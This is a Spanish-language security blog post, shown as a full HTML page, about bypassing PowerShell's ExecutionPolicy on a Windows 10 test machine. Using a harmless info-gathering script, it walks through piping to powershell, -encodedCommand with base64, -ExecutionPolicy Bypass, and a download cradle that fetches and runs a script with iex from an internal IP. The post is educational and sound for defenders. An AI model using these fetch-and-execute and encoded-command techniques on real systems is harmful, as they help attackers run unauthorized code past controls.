<!DOCTYPE html>


<html lang="en-us" data-theme="">
<head>
    
        
<meta charset="utf-8">
<meta name="HandheldFriendly" content="True">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="referrer" content="no-referrer-when-downgrade">

<title>Saltándose los controles de la Powershell - ins3cure.com</title>
<meta name="description" content="You&#39;d better check your S3 buckets before someone else does">

<link rel="icon" type="image/x-icon" href="https://ins3cure.com/favicon.ico">
<link rel="apple-touch-icon-precomposed" href="https://ins3cure.com/favicon.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">


<script async src="https://www.googletagmanager.com/gtag/js?id=UA-168677970-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-168677970-1');
</script>




    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.77f677c827f6d28cc36d9ebc5df12e45faaaf5475aa067dd6cc0c0485817a99c.css" integrity="sha256-d/Z3yCf20ozDbZ68XfEuRfqq9UdaoGfdbMDASFgXqZw=">
    





    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.c6fed49e746b6647061b86d63e3ffc352542c1c94153560619db0da4f976fca2.css" integrity="sha256-xv7UnnRrZkcGG4bWPj/8NSVCwclBU1YGGdsNpPl2/KI=">
    





<meta property="og:title" content="Saltándose los controles de la Powershell" />
<meta property="og:description" content="La política de ejecución (ExcecutionPolicy) de PowerShell de Microsoft impide la ejecución de scripts Powershell&hellip; pero no demasiado. Existen numerosas posibilidades para ejecutar scripts en PowerShell “saltándose” los controles de ejecución, que no han sido realmente pensados como un mecanismo de seguridad. Estos son algunas de esos mecanismos." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ins3cure.com/saltandose-los-controles-de-la-powershell/" /><meta property="og:image" content="https://ins3cure.com/images/og-featured.png"/><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2016-12-13T00:00:00+00:00" />
<meta property="article:modified_time" content="2016-12-13T00:00:00+00:00" />


<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://ins3cure.com/images/og-featured.png"/>

<meta name="twitter:title" content="Saltándose los controles de la Powershell"/>
<meta name="twitter:description" content="La política de ejecución (ExcecutionPolicy) de PowerShell de Microsoft impide la ejecución de scripts Powershell&hellip; pero no demasiado. Existen numerosas posibilidades para ejecutar scripts en PowerShell “saltándose” los controles de ejecución, que no han sido realmente pensados como un mecanismo de seguridad. Estos son algunas de esos mecanismos."/>










<script async src="https://www.googletagmanager.com/gtag/js?id=G-18687JCG0Q"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-18687JCG0Q');
</script>



    
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.css" />

</head>
<body>
    <a class="skip-main" href="#main">Skip to main content</a>
    <div class="container">
        <header class="common-header"> 
            
                <h1 class="site-title">
    <a href="/"><span class="cursor">% </span>ins3cure.com</a><span class="logo_cursor"></span>
</h1>

    <nav>
        
        
        <a class="" href="https://ins3cure.com/categories/" title="Categories">Categories</a>
        
        <a class="" href="https://ins3cure.com/tags/" title="Tags">Tags</a>
        
    </nav>


            
        </header>
        <main id="main" tabindex="-1"> 
            
    
    
    <article class="post">
        <header class="post-header">
            <h1 class="post-title">Saltándose los controles de la Powershell</h1>
    </header>
    

    


<div class="post-info">
    
    <div class="post-date">Posted Tuesday, Dec 13, 2016</div>
    

    <div class="post-taxonomies">
        
            <ul class="post-tags">
                
                    <li><a href="https://ins3cure.com/tags/microsoft">#microsoft</a></li>
                
                    <li><a href="https://ins3cure.com/tags/powershell">#powershell&#39;</a></li>
                
                    <li><a href="https://ins3cure.com/tags/windows">#windows</a></li>
                
            </ul>
        
    </div>
</div>

        <div class="content">
            <p>La política de ejecución (ExcecutionPolicy) de PowerShell de Microsoft impide la ejecución de scripts Powershell&hellip; pero no demasiado. Existen numerosas posibilidades para ejecutar scripts en PowerShell “saltándose” los controles de ejecución, que no han sido realmente pensados como un mecanismo de seguridad. Estos son algunas de esos mecanismos.</p>
<p>La ExecutionPolicy determina qué scripts PowerShell tienen autorización para ejecutarse en un sistema. Windows ofrece cuatro políticas:</p>
<table>
<thead>
<tr>
<th>ExecutionPolicy</th>
<th>Descripción</th>
</tr>
</thead>
<tbody>
<tr>
<td>Restricted</td>
<td>No se puede ejecutar ningún script, la PowerShell solo se puede usar en modo interactivo</td>
</tr>
<tr>
<td>AllSigned</td>
<td>Solo se pueden ejecutar scripts firmados por una entidad de confianza</td>
</tr>
<tr>
<td>RemoteSigned</td>
<td>Los scripts descargados de internet deben estar formados por una entidad de confianza</td>
</tr>
<tr>
<td>Unrestricted</td>
<td>Todos los Windows PowerShell scripts se pueden ejecutar, sin restricción</td>
</tr>
</tbody>
</table>
<p>Por defecto la política suele ser “Restricted” o “RemoteSigned”. Por ejemplo:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\&gt; get-executionpolicy -list
get-executionpolicy -list

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy       Undefined
   UserPolicy       Undefined
      <span style="color:#66d9ef">Process</span>       Undefined
  CurrentUser       Undefined
 LocalMachine      Restricted
</code></pre></div><p>Esto quiere decir que no vamos a poder ejecutar scripts no firmados. A ver si es verdad, creamos un script chorra y tratamos de ejecutarlo:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; echo <span style="color:#e6db74">&#34;Get-ChildItem&#34;</span> &gt;foo.ps1
echo <span style="color:#e6db74">&#34;Get-ChildItem&#34;</span> &gt;foo.ps1

PS C:\Users\IEUser&gt; ./foo.ps1
./foo.ps1
./foo.ps1 <span style="color:#960050;background-color:#1e0010">:</span> File C:\Users\IEUser\foo.ps1 cannot be loaded because running scripts is disabled on this system. <span style="color:#66d9ef">For</span> more 
information, see about_Execution_Policies at http<span style="color:#960050;background-color:#1e0010">:</span>//go.microsoft.com/fwlink/<span style="color:#66d9ef">?</span>LinkID=135170.
At line<span style="color:#960050;background-color:#1e0010">:</span>1 char<span style="color:#960050;background-color:#1e0010">:</span>1
+ ./foo.ps1
+ ~~~~~~~~~
    + CategoryInfo          <span style="color:#960050;background-color:#1e0010">:</span> SecurityError<span style="color:#960050;background-color:#1e0010">:</span> (<span style="color:#960050;background-color:#1e0010">:</span>) [], PSSecurityException
    + FullyQualifiedErrorId <span style="color:#960050;background-color:#1e0010">:</span> UnauthorizedAccess
</code></pre></div><p>Llegados a este punto, hay que explicar que Microsoft no implementa la ExecutionPolicy como un mecanismo de seguridad, sino como un simple control para evitar la ejecución de scripts inadvertidamente:</p>
<p><a href="https://technet.microsoft.com/en-us/gg261722.aspx">Windows PowerShell Script Security</a>:</p>
<blockquote>
<p>It may seem odd to permit users to override an administrator-established value for the execution policy, but remember that the execution policy is intended to help stop unintended script execution. It is not intended to stop skilled users from executing scripts at all, merely to ensure that they do not do so without knowing what they are doing.</p>
</blockquote>
<p>Bien, aclarado esto vamos a saltarnos el “control”. Supongamos que queremos ejecutar una serie de comandos para obtener información de una máquina; para que no sea muy largo nos limitaremos a esto:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\users\IEUser&gt; Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl 
Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl


Caption                 <span style="color:#960050;background-color:#1e0010">:</span> Microsoft Windows 10 Enterprise Evaluation
InstallDate             <span style="color:#960050;background-color:#1e0010">:</span> 7/21/2016 9<span style="color:#960050;background-color:#1e0010">:</span>12<span style="color:#960050;background-color:#1e0010">:</span>03 AM
ServicePackMajorVersion <span style="color:#960050;background-color:#1e0010">:</span> 0
OSArchitecture          <span style="color:#960050;background-color:#1e0010">:</span> 64-bit
BootDevice              <span style="color:#960050;background-color:#1e0010">:</span> \Device\HarddiskVolume1
BuildNumber             <span style="color:#960050;background-color:#1e0010">:</span> 14393
CSName                  <span style="color:#960050;background-color:#1e0010">:</span> MSEDGEWIN10

PS C:\users\IEUser&gt; Get-Hotfix
Get-Hotfix

Source        Description      HotFixID      InstalledBy          InstalledOn              
------        -----------      --------      -----------          -----------              
MSEDGEWIN10   Update           KB3199986     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM   
MSEDGEWIN10   Security Update  KB3202790     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM   
MSEDGEWIN10   Update           KB3201845     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM   
</code></pre></div><p>Almacenamos el “script” en un fichero Get-BasicInfo.ps1 e intentamos ejecutarlo. Y, claro, pasa lo que pasa:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\users\IEUser&gt; ./Get-BasicInfo.ps1
./Get-BasicInfo.ps1
./Get-BasicInfo.ps1 <span style="color:#960050;background-color:#1e0010">:</span> File C:\users\IEUser\Get-BasicInfo.ps1 cannot be loaded because running scripts is disabled on 
this system. <span style="color:#66d9ef">For</span> more information, see about_Execution_Policies at http<span style="color:#960050;background-color:#1e0010">:</span>//go.microsoft.com/fwlink/<span style="color:#66d9ef">?</span>LinkID=135170.
At line<span style="color:#960050;background-color:#1e0010">:</span>1 char<span style="color:#960050;background-color:#1e0010">:</span>1
+ ./Get-BasicInfo.ps1
+ ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          <span style="color:#960050;background-color:#1e0010">:</span> SecurityError<span style="color:#960050;background-color:#1e0010">:</span> (<span style="color:#960050;background-color:#1e0010">:</span>) [], PSSecurityException
    + FullyQualifiedErrorId <span style="color:#960050;background-color:#1e0010">:</span> UnauthorizedAccess
</code></pre></div><p>Pues veamos algunas de las numerosas soluciones al problema:</p>
<ul>
<li>Copiar y pegar</li>
<li>echo + pipe</li>
<li>Descargar de URL + Invoke-Expression</li>
<li>Argumento -command</li>
<li>Argumento -encodedCommand</li>
<li>El comando Invoke-Command
<ul>
<li>ExecutionPolicy Bypass</li>
<li>ExecutionPolicy Unrestricted</li>
</ul>
</li>
<li>Cambiar ExecutionPolicy para este proceso en particular</li>
<li>Lo mismo para un usuario</li>
</ul>
<h3 id="copiar-y-pegar">Copiar y pegar</h3>
<p>Tal cual. Basta con copiar y pegar el contenido del script. Porque entonces ya no es un script, es interactivo… :)</p>
<h3 id="echo--pipe">echo + pipe</h3>
<p>Obtener el contenido del script con echo, type p similar (<code>Get-Content</code>, pasa ser más posh) y pasárselo vía pipe a&hellip; una powershell:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\users\ieuser&gt; Get-Content Get-BasicInfo.ps1 | powershell -noprofile -
Get-Content Get-BasicInfo.ps1 | powershell -noprofile -
Cannot load PSReadline module.  Console is running without PSReadline.


Caption                 <span style="color:#960050;background-color:#1e0010">:</span> Microsoft Windows 10 Enterprise Evaluation
InstallDate             <span style="color:#960050;background-color:#1e0010">:</span> 7/21/2016 9<span style="color:#960050;background-color:#1e0010">:</span>12<span style="color:#960050;background-color:#1e0010">:</span>03 AM
ServicePackMajorVersion <span style="color:#960050;background-color:#1e0010">:</span> 0
OSArchitecture          <span style="color:#960050;background-color:#1e0010">:</span> 64-bit
BootDevice              <span style="color:#960050;background-color:#1e0010">:</span> \Device\HarddiskVolume1
BuildNumber             <span style="color:#960050;background-color:#1e0010">:</span> 14393
CSName                  <span style="color:#960050;background-color:#1e0010">:</span> MSEDGEWIN10




Source        Description      HotFixID      InstalledBy          InstalledOn              
------        -----------      --------      -----------          -----------              
MSEDGEWIN10   Update           KB3199986     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM   
MSEDGEWIN10   Security Update  KB3202790     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM   
MSEDGEWIN10   Update           KB3201845     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM
</code></pre></div><h3 id="descargar-de-url--invoke-expression">Descargar de URL + Invoke Expression</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\users\ieuser&gt; powershell -nop -c <span style="color:#e6db74">&#34;iex(New-Object Net.WebClient).DownloadString(&#39;http://10.254.0.1:8000/Get-BasicInfo.ps1&#39;)&#34;</span>
powershell -nop -c <span style="color:#e6db74">&#34;iex(New-Object Net.WebClient).DownloadString(&#39;http://10.254.0.1:8000/Get-BasicInfo.ps1&#39;)&#34;</span>


Caption                 <span style="color:#960050;background-color:#1e0010">:</span> Microsoft Windows 10 Enterprise Evaluation
InstallDate             <span style="color:#960050;background-color:#1e0010">:</span> 7/21/2016 9<span style="color:#960050;background-color:#1e0010">:</span>12<span style="color:#960050;background-color:#1e0010">:</span>03 AM
ServicePackMajorVersion <span style="color:#960050;background-color:#1e0010">:</span> 0
OSArchitecture          <span style="color:#960050;background-color:#1e0010">:</span> 64-bit
BootDevice              <span style="color:#960050;background-color:#1e0010">:</span> \Device\HarddiskVolume1
BuildNumber             <span style="color:#960050;background-color:#1e0010">:</span> 14393
CSName                  <span style="color:#960050;background-color:#1e0010">:</span> MSEDGEWIN10




Source        Description      HotFixID      InstalledBy          InstalledOn              
------        -----------      --------      -----------          -----------              
MSEDGEWIN10   Update           KB3199986     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM   
MSEDGEWIN10   Security Update  KB3202790     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM   
MSEDGEWIN10   Update           KB3201845     NT AUTHORITY\SYSTEM  12/13/2016 12<span style="color:#960050;background-color:#1e0010">:</span>00<span style="color:#960050;background-color:#1e0010">:</span>00 AM
</code></pre></div><h3 id="argumento--command">Argumento -command</h3>
<p>Parecido a “copiar y pegar”:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\users\ieuser&gt; powershell -command <span style="color:#e6db74">&#34;Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl
</span><span style="color:#e6db74">powershell -command &#34;</span>Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl
&gt;&gt; Get-Hotfix<span style="color:#e6db74">&#34;
</span><span style="color:#e6db74">
</span><span style="color:#e6db74">Caption                 : Microsoft Windows 10 Enterprise Evaluation
</span><span style="color:#e6db74">[...]
</span></code></pre></div><p>(Ya no pongo la salida más veces si no es estrictamente necesario)</p>
<h3 id="argumento--encodedcommand">Argumento -encodedCommand</h3>
<p>Esto viene directamente the the NetSPI blog. Es, de nuevo, “pegar” el contenido de nuestro script en una varible, codificarla en unicode/base64 -lo que evitaría problemas habituales del caso anterior- y ejecutarla mendiante -encodedCommand. Por ejemplo:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; $command=<span style="color:#e6db74">&#34;Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl
</span><span style="color:#e6db74">$command=&#34;</span>Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl
&gt;&gt; Get-Hotfix<span style="color:#e6db74">&#34;
</span><span style="color:#e6db74">Get-Hotfix&#34;</span>
&gt;&gt; 
</code></pre></div><p>Codificamos:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; $bytes = <span style="color:#66d9ef">[System.Text.Encoding]</span>::Unicode.GetBytes($command)
$bytes = <span style="color:#66d9ef">[System.Text.Encoding]</span>::Unicode.GetBytes($command)

PS C:\Users\IEUser&gt; $encodedCommand = <span style="color:#66d9ef">[Convert]</span>::ToBase64String($bytes)
$encodedCommand = <span style="color:#66d9ef">[Convert]</span>::ToBase64String($bytes)

PS C:\Users\IEUser&gt; $encodedCommand
$encodedCommand
RwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAAIABDAGEAcAB0AGkAbwBuACwAIABJAG4AcwB0AGEAbABsAEQAYQB0AGUALAAgAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAsACAATwBTAEEAcgBjAGgAaQB0AGUAYwB0AHUAcgBlACwAIABCAG8AbwB0AEQAZQB2AGkAYwBlACwAIAAgAEIAdQBpAGwAZABOAHUAbQBiAGUAcgAsACAAQwBTAE4AYQBtAGUAIAB8ACAAZgBsAAoARwBlAHQALQBIAG8AdABmAGkAeAA=
</code></pre></div><p>Y ejecutamos:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; powershell.exe -EncodedCommand $encodedCommand
powershell.exe -EncodedCommand $encodedCommand
<span style="color:#75715e">#&lt; CLIXML</span>


Caption                 <span style="color:#960050;background-color:#1e0010">:</span> Microsoft Windows 10 Enterprise Evaluation
[...]
</code></pre></div><h3 id="el-comando-invoke-command">El comando Invoke-Command</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; invoke-command -scriptblock {Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl;echo;Get-Hotfix}
invoke-command -scriptblock {Get-CimInstance Win32_OperatingSystem | Select-Object  Caption, InstallDate, ServicePackMajorVersion, OSArchitecture, BootDevice,  BuildNumber, CSName | fl;echo;Get-Hotfix}


Caption                 <span style="color:#960050;background-color:#1e0010">:</span> Microsoft Windows 10 Enterprise Evaluation
[...]
</code></pre></div><h3 id="-executionpolicy-bypass">-ExecutionPolicy Bypass</h3>
<p>Esta me parece cachondísima:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; PowerShell.exe -ExecutionPolicy Bypass <span style="color:#f92672">-File</span> Get-BasicInfo.ps1
PowerShell.exe -ExecutionPolicy Bypass <span style="color:#f92672">-File</span> Get-BasicInfo.ps1


Caption                 <span style="color:#960050;background-color:#1e0010">:</span> Microsoft Windows 10 Enterprise Evaluation
[...]
</code></pre></div><h3 id="-executionpolicy-unrestricted">-ExecutionPolicy Unrestricted</h3>
<p>Similar a la anterior, con sutiles diferencias esbozadas en the NetSPI blog o en la documentación de Microsoft:</p>
<ul>
<li><a href="https://blogs.technet.microsoft.com/christwe/2012/09/20/but-i-ran-set-executionpolicy-unrestricted-what-is-going-on/">But I ran Set-Executionpolicy unrestricted, what is going on?</a></li>
<li><a href="https://msdn.microsoft.com/powershell/reference/5.1/Microsoft.PowerShell.Core/about/about_Execution_Policies">MSDN: About Execution Policies</a></li>
</ul>
<h3 id="cambiar-executionpolicy-para-este-proceso-en-particular">Cambiar ExecutionPolicy para este proceso en particular</h3>
<p>La ExecutionPolicy puede ser distinta en distintos ámbitos; pues la cambiamos para este proceso de PowerShell:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; Get-ExecutionPolicy -list
Get-ExecutionPolicy -list

        Scope ExecutionPolicy
        ----- ---------------
MachinePolicy       Undefined
   UserPolicy       Undefined
      <span style="color:#66d9ef">Process</span>       Undefined
  CurrentUser      Restricted
 LocalMachine      Restricted



PS C:\Users\IEUser&gt; Set-ExecutionPolicy Unrestricted -Scope <span style="color:#66d9ef">Process</span>
Set-ExecutionPolicy Unrestricted -Scope <span style="color:#66d9ef">Process</span>

PS C:\Users\IEUser&gt; ./Get-BasicInfo.ps1
./Get-BasicInfo.ps1


Caption                 <span style="color:#960050;background-color:#1e0010">:</span> Microsoft Windows 10 Enterprise Evaluation
[...]
</code></pre></div><h3 id="lo-mismo-para-un-usuario">Lo mismo para un usuario</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">PS C:\Users\IEUser&gt; Set-ExecutionPolicy Unrestricted -Scope CurrentUser
</code></pre></div><p>Hay muchas otras formas, algunas creativas y originales, pero esto es más que suficiente. Queda suficientemente claro que Microsoft nunca entendió la ExecutionPolicy como un control de seguridad; de hecho, proporciona los mecanismos para sortearla.</p>
        </div>
    </article>

    
        
    <div class="pagination post-pagination">
        <div class="left pagination-item ">
            
                <a href="/buffer-overflow/">← Buffer overflow</a>
            
        </div>
        <div class="right pagination-item ">
            
                <a href="/encoding-con-bash-shell/">Encoding con bash →</a>
            
        </div>
    </div>

    

    
        <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "ins3cure-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
    


        </main>
        
            <footer class="common-footer">
    
    

    <div class="common-footer-bottom">
        
        <div class="copyright">
            <p>Mandatory legal stuff:
            <a href="/legal">Legal notice</a> · 
            <a href="/privacy">Privacy policy</a> · 
            <a href="/cookies">Cookie policy</a><br>
            © ins3cure.com, 2022 · <a href="/about">About us</a><br>
            Powered by <a target="_blank" rel="noopener noreferrer" href="https://gohugo.io/">Hugo</a>, theme based on <a target="_blank" rel="noopener noreferrer" href="https://github.com/mitrichius/hugo-theme-anubis">Anubis</a>.
            </p>  
        </div> 

        

    



    <button class="theme-switcher">
        Dark theme
    </button>

    <script>
    const STORAGE_KEY = 'user-color-scheme'
    const defaultTheme = "auto"

    let currentTheme
    let switchButton
    let autoDefinedScheme = window.matchMedia('(prefers-color-scheme: dark)')

    const autoChangeScheme = e => {
        currentTheme = e.matches ? 'dark' : 'light'
        document.documentElement.setAttribute('data-theme', currentTheme)
        changeButtonText()
    }

    document.addEventListener('DOMContentLoaded', function() {
        switchButton = document.querySelector('.theme-switcher')
        currentTheme = detectCurrentScheme()
        if (currentTheme == 'dark') {
            document.documentElement.setAttribute('data-theme', 'dark')
        }
        if (currentTheme == 'auto') {
            autoChangeScheme(autoDefinedScheme);
            autoDefinedScheme.addListener(autoChangeScheme);
        }
        changeButtonText()
        switchButton.addEventListener('click', switchTheme, false)
    })

    function detectCurrentScheme() {
        if (localStorage.getItem(STORAGE_KEY)) {
            return localStorage.getItem(STORAGE_KEY)
        } 
        if (defaultTheme) {
            return defaultTheme
        } 
        if (!window.matchMedia) {
            return 'light'
        } 
        if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
            return 'dark'
        }
        return 'light'
    }

    function changeButtonText()
    {   
        switchButton.textContent = currentTheme == 'dark' ?  "Light theme" : "Dark theme"
    }

    function switchTheme(e) {
        if (currentTheme == 'dark') {
            localStorage.setItem(STORAGE_KEY, 'light')
            document.documentElement.setAttribute('data-theme', 'light')
            currentTheme = 'light'
        } else {
            localStorage.setItem(STORAGE_KEY, 'dark')
            document.documentElement.setAttribute('data-theme', 'dark')
            currentTheme = 'dark'
        }
        changeButtonText()
    }
    </script>
   
    </div>
</footer>

        
    </div>
    <script src="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.js" data-cfasync="false"></script>
<script>
window.cookieconsent.initialise({
  "palette": {
    "popup": {
      "background": "#252e39"
    },
    "button": {
      "background": "#14a7d0"
    }
  },
  "theme": "classic",
  "content": {
    "message": "This website uses cookies to ensure you get the best experience on our website",
    "dismiss": "Got it!",
    "link": "Learn more",
    "href": "/cookiepolicy"
  }
});
</script>
</body>
</html>
